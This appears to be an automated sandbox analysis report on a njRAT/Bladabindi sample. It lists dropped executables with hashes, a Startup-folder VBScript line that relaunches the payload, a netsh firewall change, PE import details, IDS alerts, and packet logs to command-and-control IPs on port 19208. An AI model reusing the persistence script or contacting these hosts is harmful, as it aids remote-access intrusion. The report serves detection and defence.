Preview:	1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\bec14584c93014efbc76285c35d1e891\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\7d443c6c007fe8696f9aa6ff1da53ef7\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\2cdaeaf53e3d49038cf7cb0ce9d805d3\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\d0e5535854cce87ea7f2d69d0594b7a8\System.Windows.Forms.ni.dll",0..

C:\Users\user\AppData\Local\Temp\WindowsServices.exe

Download File

Process:	C:\Users\user\Desktop\nOZ2Oqnzbz.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	4.9674574626610895
Encrypted:	false
SSDEEP:	1536:6Mnt+J23KumyB/VWHsJwcabSMH2Bcj9uzhZvsWgk:6EtE23K8TWHsJra+MH2ajszhZvxgk
MD5:	7BAE06CBE364BB42B8C34FCFB90E3EBD
SHA1:	79129AF7EFA46244DA0676607242F0A6B7E12E78
SHA-256:	6CEAEBD55B4A542EF64BE1D6971FCFE802E67E2027366C52FAACC8A8D325EC7A
SHA-512:	C599B72500A5C17CD5C4A81FCF220A95925AA0E5AD72AA92DD1A469FE6E3C23590C548A0BE7EC2C4DBD737511A0A79C1C46436867CF7F0C4DF21F8DCEA9686CF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: iR2UtZj5vP.exe, Detection: malicious, Browse Filename: l0HzgCOAMF.exe, Detection: malicious, Browse Filename: clSwWjTkJf.exe, Detection: malicious, Browse Filename: _____(NYCU_2307-19TW)#Ufffdpdf.exe, Detection: malicious, Browse Filename: 1_#Ud611#Ub825#Uc0ac_Hot_Line_#Uc900#Uc218_#Ud611#Uc870_#Uc694#Uccad#Uc758#Uac74.exe, Detection: malicious, Browse Filename: DHL_IMPORT_TAX__INVOICE_3129143010_KRJ202318092409s.exe, Detection: malicious, Browse Filename: 0473350311911207E#U00b7pdf.exe, Detection: malicious, Browse Filename: PO#2301-DBOU5200338-6452951_-_DR_0-TTQT.TT.01_nh#U1ea5t_2023.exe, Detection: malicious, Browse Filename: 2301_20230101_REGIA_BUILDING_KFT__443512415141300_NYUGTA#U00b7pdf.exe, Detection: malicious, Browse Filename: DIEN_CHUYEN_TIEN_SacomBank-TT_20230421-1191736-80192949.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......].................p... ........... ........@.. ...............................C....@.................................P...K................................................................................... ............... ..H............text....j... ...p.................. ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\WindowsServices.exex (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\WindowsServices.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	4.9674574626610895
Encrypted:	false
SSDEEP:	1536:6Mnt+J23KumyB/VWHsJwcabSMH2Bcj9uzhZvsWgk:6EtE23K8TWHsJra+MH2ajszhZvxgk
MD5:	7BAE06CBE364BB42B8C34FCFB90E3EBD
SHA1:	79129AF7EFA46244DA0676607242F0A6B7E12E78
SHA-256:	6CEAEBD55B4A542EF64BE1D6971FCFE802E67E2027366C52FAACC8A8D325EC7A
SHA-512:	C599B72500A5C17CD5C4A81FCF220A95925AA0E5AD72AA92DD1A469FE6E3C23590C548A0BE7EC2C4DBD737511A0A79C1C46436867CF7F0C4DF21F8DCEA9686CF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: iR2UtZj5vP.exe, Detection: malicious, Browse Filename: l0HzgCOAMF.exe, Detection: malicious, Browse Filename: clSwWjTkJf.exe, Detection: malicious, Browse Filename: _____(NYCU_2307-19TW)#Ufffdpdf.exe, Detection: malicious, Browse Filename: 1_#Ud611#Ub825#Uc0ac_Hot_Line_#Uc900#Uc218_#Ud611#Uc870_#Uc694#Uccad#Uc758#Uac74.exe, Detection: malicious, Browse Filename: DHL_IMPORT_TAX__INVOICE_3129143010_KRJ202318092409s.exe, Detection: malicious, Browse Filename: 0473350311911207E#U00b7pdf.exe, Detection: malicious, Browse Filename: PO#2301-DBOU5200338-6452951_-_DR_0-TTQT.TT.01_nh#U1ea5t_2023.exe, Detection: malicious, Browse Filename: 2301_20230101_REGIA_BUILDING_KFT__443512415141300_NYUGTA#U00b7pdf.exe, Detection: malicious, Browse Filename: DIEN_CHUYEN_TIEN_SacomBank-TT_20230421-1191736-80192949.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......].................p... ........... ........@.. ...............................C....@.................................P...K................................................................................... ............... ..H............text....j... ...p.................. ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\WindowsServices.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	348002
Entropy (8bit):	5.838916133471261
Encrypted:	false
SSDEEP:	6144:KSTz3MaMNhXbyuWt2EHOO+7qeA5fphPFrKz1K5gkg//r0OKYUPR6fTD:3Ty7Ats/w6LD
MD5:	ACB30A04DA7096C99877B47F3050190D
SHA1:	89299EF483F4C276260193AE2FE4AB4F014C12AA
SHA-256:	43F9346F00F00794F88D0D23B096B19E6BBD95AC7BDE24B2619E139E1A7CC239
SHA-512:	B4DDAE99CCBA2D2AFF8EE08BF76BEA557650645944593EE133FCA923196D6DA12415A0D856452EDDCC2721A0E2714A26476B09DE54E7EE681CD9D3A1A01E406D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 87% Antivirus: Virustotal, Detection: 86%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+...E...E...E.T.....E...K...E...O...E...A...E...N...E...A...E...D.R.E...N...E.P.C...E.Rich..E.........................PE..L.....\.....................`....................@.......................... ..............................................P...x....................................................................................................................text............................... ..`.rdata........... ..................@..@.data..../.......0..................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	116
Entropy (8bit):	4.893878336926311
Encrypted:	false
SSDEEP:	3:VfX9GTfmQKn0eFH5Ot+kiE2J5xAI6tHJUkn:VtGTfmQolFHIwkn23fOakn
MD5:	ED68606120D25DF895C95AA5543C5193
SHA1:	539AB5F1C9607DCC3B873D34DE2F0AF1E08EBD1C
SHA-256:	A75FFBB9CB1901F530404F2BA80E53791A7A759D2DAACA8A81A5E70DD83F25D6
SHA-512:	994DE00793A62B68056772924E6C7BC058510F5890BAD360AC668E56538EABAB6C11AB663C999B88E37153E798EAC94B06820F24F564679AF541AC72EFA26BDC
Malicious:	true
Preview:	on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: ..

C:\Users\user\Desktop\nOZ2Oqnzbz.exe

Download File

Process:	C:\Users\user\Desktop\nOZ2Oqnzbz.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	4.9674574626610895
Encrypted:	false
SSDEEP:	1536:6Mnt+J23KumyB/VWHsJwcabSMH2Bcj9uzhZvsWgk:6EtE23K8TWHsJra+MH2ajszhZvxgk
MD5:	7BAE06CBE364BB42B8C34FCFB90E3EBD
SHA1:	79129AF7EFA46244DA0676607242F0A6B7E12E78
SHA-256:	6CEAEBD55B4A542EF64BE1D6971FCFE802E67E2027366C52FAACC8A8D325EC7A
SHA-512:	C599B72500A5C17CD5C4A81FCF220A95925AA0E5AD72AA92DD1A469FE6E3C23590C548A0BE7EC2C4DBD737511A0A79C1C46436867CF7F0C4DF21F8DCEA9686CF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......].................p... ........... ........@.. ...............................C....@.................................P...K................................................................................... ............... ..H............text....j... ...p.................. ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\nOZ2Oqnzbz.exex (copy)

Download File

Process:	C:\Users\user\Desktop\nOZ2Oqnzbz.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	4.9674574626610895
Encrypted:	false
SSDEEP:	1536:6Mnt+J23KumyB/VWHsJwcabSMH2Bcj9uzhZvsWgk:6EtE23K8TWHsJra+MH2ajszhZvxgk
MD5:	7BAE06CBE364BB42B8C34FCFB90E3EBD
SHA1:	79129AF7EFA46244DA0676607242F0A6B7E12E78
SHA-256:	6CEAEBD55B4A542EF64BE1D6971FCFE802E67E2027366C52FAACC8A8D325EC7A
SHA-512:	C599B72500A5C17CD5C4A81FCF220A95925AA0E5AD72AA92DD1A469FE6E3C23590C548A0BE7EC2C4DBD737511A0A79C1C46436867CF7F0C4DF21F8DCEA9686CF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......].................p... ........... ........@.. ...............................C....@.................................P...K................................................................................... ............... ..H............text....j... ...p.................. ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Windows\SysWOW64\netsh.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	313
Entropy (8bit):	4.971939296804078
Encrypted:	false
SSDEEP:	6:/ojfKsUTGN8Ypox42k9L+DbGMKeQE+vigqAZs2E+AYeDPO+Yswyha:wjPIGNrkHk9iaeIM6ADDPOHyha
MD5:	689E2126A85BF55121488295EE068FA1
SHA1:	09BAAA253A49D80C18326DFBCA106551EBF22DD6
SHA-256:	D968A966EF474068E41256321F77807A042F1965744633D37A203A705662EC25
SHA-512:	C3736A8FC7E6573FA1B26FE6A901C05EE85C55A4A276F8F569D9EADC9A58BEC507D1BB90DBF9EA62AE79A6783178C69304187D6B90441D82E46F5F56172B5C5C
Malicious:	false
Preview:	..IMPORTANT: Command executed successfully...However, "netsh firewall" is deprecated;..use "netsh advfirewall firewall" instead...For more information on using "netsh advfirewall firewall" commands..instead of "netsh firewall", see KB article 947709..at https://go.microsoft.com/fwlink/?linkid=121488 .....Ok.....

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.838916133471261
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	nOZ2Oqnzbz.exe
File size:	348'002 bytes
MD5:	acb30a04da7096c99877b47f3050190d
SHA1:	89299ef483f4c276260193ae2fe4ab4f014c12aa
SHA256:	43f9346f00f00794f88d0d23b096b19e6bbd95ac7bde24b2619e139e1a7cc239
SHA512:	b4ddae99ccba2d2aff8ee08bf76bea557650645944593ee133fca923196d6da12415a0d856452eddcc2721a0e2714a26476b09de54e7ee681cd9d3a1a01e406d
SSDEEP:	6144:KSTz3MaMNhXbyuWt2EHOO+7qeA5fphPFrKz1K5gkg//r0OKYUPR6fTD:3Ty7Ats/w6LD
TLSH:	8F741A8FED44DBBAC26E86B6D5AF075E43524322AE0B3647A33D9091791374323B634D
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........+...E...E...E.T.....E...K...E...O...E...A...E...N...E...A...E...D.R.E...N...E.P.C...E.Rich..E.........................PE..L..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x40b10f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x5CEE8DCE [Wed May 29 13:49:02 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	676f4bc1db7fb9f072b157186a10179e

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 0040C7C0h
push 0040B296h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 68h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
xor ebx, ebx
mov dword ptr [ebp-04h], ebx
push 00000002h
call dword ptr [0040C268h]
pop ecx
or dword ptr [00440FACh], FFFFFFFFh
or dword ptr [00440FB0h], FFFFFFFFh
call dword ptr [0040C2B8h]
mov ecx, dword ptr [00440FA0h]
mov dword ptr [eax], ecx
call dword ptr [0040C2BCh]
mov ecx, dword ptr [00440F9Ch]
mov dword ptr [eax], ecx
mov eax, dword ptr [0040C2B0h]
mov eax, dword ptr [eax]
mov dword ptr [00440FA8h], eax
call 00007FE75CC8DD0Ch
cmp dword ptr [00440EC0h], ebx
jne 00007FE75CC8DBFEh
push 0040B292h
call dword ptr [0040C2ACh]
pop ecx
call 00007FE75CC8DCDEh
push 0040E014h
push 0040E010h
call 00007FE75CC8DCC9h
mov eax, dword ptr [00440F98h]
mov dword ptr [ebp-6Ch], eax
lea eax, dword ptr [ebp-6Ch]
push eax
push dword ptr [00440F94h]
lea eax, dword ptr [ebp-64h]
push eax
lea eax, dword ptr [ebp-70h]
push eax
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [0040C2A4h]
push 0040E00Ch
push 0040E000h
call 00007FE75CC8DC96h

Rich Headers

Programming Language:

[C++] VS98 (6.0) SP6 build 8804
[C++] VS98 (6.0) build 8168
[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xcc50	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x41000	0x6ec	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xa692	0xb000	46e431cfe2a9ff66c9f2acb67ae1741f	False	0.394287109375	data	6.066698480794713	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xc000	0x13f2	0x2000	8e51e8226f8762c1d694ab2f869e1a74	False	0.2220458984375	data	2.813303655539336	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xe000	0x32fb4	0x33000	ee2d57c265aa3a5bb323757aa2b27c78	False	0.34042777267156865	data	4.549128828468098	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x41000	0x1000	0x1000	00594881de82a393e2a0f071498f0f46	False	0.17138671875	data	1.623209958499508	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x411a8	0x134	data	English	United States	0.4577922077922078
RT_DIALOG	0x412dc	0x36	data	English	United States	0.7962962962962963
RT_DIALOG	0x41314	0x42	data	English	United States	0.8181818181818182
RT_STRING	0x41358	0x4a	data	English	United States	0.6081081081081081
RT_GROUP_CURSOR	0x413a4	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_VERSION	0x413b8	0x334	data	English	United States	0.4426829268292683

Imports

DLL	Import
KERNEL32.DLL	GetStartupInfoA, GetModuleHandleA, LoadLibraryA, ExitProcess, SetThreadContext, WriteProcessMemory, VirtualAllocEx, CreateProcessW, GetProcAddress, GetModuleFileNameW
GDI32.dll	PolyPolygon, Escape, ExtTextOutA, TextOutA, RectVisible, PtVisible, CreateCompatibleDC, LPtoDP, CreateCompatibleBitmap, GetMapMode, Polygon, PtInRegion, CreatePolygonRgn, CombineRgn, Polyline, BitBlt, DPtoLP
MFC42.DLL
MSVCRT.dll	_except_handler3, __set_app_type, _setmbcp, __CxxFrameHandler, _ftol, wcslen, wcsstr, strstr, wcscat, wcscpy, __dllonexit, _onexit, _exit, _XcptFilter, exit, _acmdln, __getmainargs, _initterm, __setusermatherr, _adjust_fdiv, _controlfp, __p__fmode, __p__commode
USER32.dll	EnableWindow, GrayStringA, DrawTextA, TabbedTextOutA, LoadCursorA, SetCursor, ClientToScreen, IsIconic, GetSystemMetrics, GetClientRect, DrawIcon, SendMessageA, LoadIconA, ReleaseCapture, GetWindowRect, SetWindowRgn, SetCapture, CopyRect

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.43.6.98.23249754192082033132 02/08/24-06:54:17.203251	TCP	2033132	ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)	49754	19208	192.168.2.4	3.6.98.232
192.168.2.43.6.98.23249753192082033132 02/08/24-06:53:47.167039	TCP	2033132	ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)	49753	19208	192.168.2.4	3.6.98.232
192.168.2.43.6.115.6449740192082033132 02/08/24-06:52:40.778707	TCP	2033132	ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)	49740	19208	192.168.2.4	3.6.115.64
192.168.2.43.6.115.6449750192082033132 02/08/24-06:53:17.004564	TCP	2033132	ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)	49750	19208	192.168.2.4	3.6.115.64
192.168.2.43.6.115.6449745192082033132 02/08/24-06:52:56.886497	TCP	2033132	ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)	49745	19208	192.168.2.4	3.6.115.64
192.168.2.43.6.115.6449746192082033132 02/08/24-06:53:02.654805	TCP	2033132	ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)	49746	19208	192.168.2.4	3.6.115.64
192.168.2.43.6.115.6449735192082033132 02/08/24-06:52:19.109017	TCP	2033132	ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)	49735	19208	192.168.2.4	3.6.115.64
192.168.2.43.6.115.6449736192082033132 02/08/24-06:52:23.314373	TCP	2033132	ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)	49736	19208	192.168.2.4	3.6.115.64
192.168.2.43.6.115.6449748192082033132 02/08/24-06:53:09.670781	TCP	2033132	ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)	49748	19208	192.168.2.4	3.6.115.64
192.168.2.43.6.115.6449737192082033132 02/08/24-06:52:28.873469	TCP	2033132	ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)	49737	19208	192.168.2.4	3.6.115.64
192.168.2.43.6.115.6449743192082033132 02/08/24-06:52:53.287877	TCP	2033132	ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)	49743	19208	192.168.2.4	3.6.115.64
192.168.2.43.6.115.6449747192082033132 02/08/24-06:53:05.744099	TCP	2033132	ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)	49747	19208	192.168.2.4	3.6.115.64
192.168.2.43.6.115.6449742192082033132 02/08/24-06:52:48.846165	TCP	2033132	ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)	49742	19208	192.168.2.4	3.6.115.64
192.168.2.43.6.115.6449739192082033132 02/08/24-06:52:37.039479	TCP	2033132	ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)	49739	19208	192.168.2.4	3.6.115.64
192.168.2.43.6.98.23249751192082033132 02/08/24-06:53:22.365303	TCP	2033132	ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)	49751	19208	192.168.2.4	3.6.98.232
192.168.2.43.6.115.18249755192082033132 02/08/24-06:54:57.629247	TCP	2033132	ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)	49755	19208	192.168.2.4	3.6.115.182
192.168.2.43.6.98.23249752192082033132 02/08/24-06:53:27.364368	TCP	2033132	ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)	49752	19208	192.168.2.4	3.6.98.232
192.168.2.43.6.115.6449738192082033132 02/08/24-06:52:32.434036	TCP	2033132	ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)	49738	19208	192.168.2.4	3.6.115.64
192.168.2.43.6.115.6449741192082033132 02/08/24-06:52:45.605256	TCP	2033132	ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)	49741	19208	192.168.2.4	3.6.115.64
192.168.2.43.6.115.6449749192082033132 02/08/24-06:53:13.881752	TCP	2033132	ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)	49749	19208	192.168.2.4	3.6.115.64

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 8, 2024 06:52:16.918523073 CET	49735	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:17.232906103 CET	19208	49735	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:17.232985020 CET	49735	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:17.899408102 CET	19208	49735	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:18.021317005 CET	49735	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:19.109016895 CET	49735	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:19.420628071 CET	19208	49735	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:19.420691013 CET	49735	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:19.695369959 CET	19208	49735	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:19.695389986 CET	19208	49735	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:19.695974112 CET	49735	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:19.732274055 CET	19208	49735	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:20.007632971 CET	19208	49735	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:21.159702063 CET	49736	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:21.470405102 CET	19208	49736	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:21.470539093 CET	49736	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:22.075583935 CET	19208	49736	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:22.224323988 CET	49736	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:23.314373016 CET	49736	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:23.626043081 CET	19208	49736	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:23.626132965 CET	49736	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:23.870831966 CET	19208	49736	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:23.871077061 CET	19208	49736	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:23.871145964 CET	49736	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:23.937096119 CET	19208	49736	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:24.181664944 CET	19208	49736	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:25.401853085 CET	49737	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:25.717850924 CET	19208	49737	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:25.718301058 CET	49737	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:26.334085941 CET	19208	49737	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:26.521281004 CET	49737	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:28.873469114 CET	49737	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:29.189502954 CET	19208	49737	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:29.189903975 CET	49737	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:29.395960093 CET	19208	49737	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:29.396024942 CET	19208	49737	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:29.396320105 CET	49737	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:29.505858898 CET	19208	49737	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:29.712327003 CET	19208	49737	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:30.956058025 CET	49738	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:31.272542000 CET	19208	49738	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:31.272733927 CET	49738	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:31.897855997 CET	19208	49738	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:32.036915064 CET	49738	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:32.434036016 CET	49738	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:32.750375032 CET	19208	49738	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:32.750559092 CET	49738	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:32.969711065 CET	19208	49738	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:32.969969988 CET	19208	49738	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:32.970120907 CET	49738	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:33.067148924 CET	19208	49738	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:33.287281036 CET	19208	49738	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:34.511887074 CET	49739	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:34.819303036 CET	19208	49739	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:34.819529057 CET	49739	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:35.438219070 CET	19208	49739	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:35.614934921 CET	49739	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:37.039479017 CET	49739	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:37.346621037 CET	19208	49739	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:37.346828938 CET	49739	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:37.567574978 CET	19208	49739	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:37.567599058 CET	19208	49739	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:37.567765951 CET	49739	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:37.653840065 CET	19208	49739	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:37.874906063 CET	19208	49739	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:39.073712111 CET	49740	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:39.381108999 CET	19208	49740	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:39.381196022 CET	49740	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:40.039539099 CET	19208	49740	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:40.224311113 CET	49740	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:40.778707027 CET	49740	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:41.085767984 CET	19208	49740	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:41.085850954 CET	49740	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:41.304913044 CET	19208	49740	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:41.304932117 CET	19208	49740	3.6.115.64	192.168.2.4
Feb 8, 2024 06:52:41.304994106 CET	49740	19208	192.168.2.4	3.6.115.64
Feb 8, 2024 06:52:41.392884970 CET	19208	49740	3.6.115.64	192.168.2.4
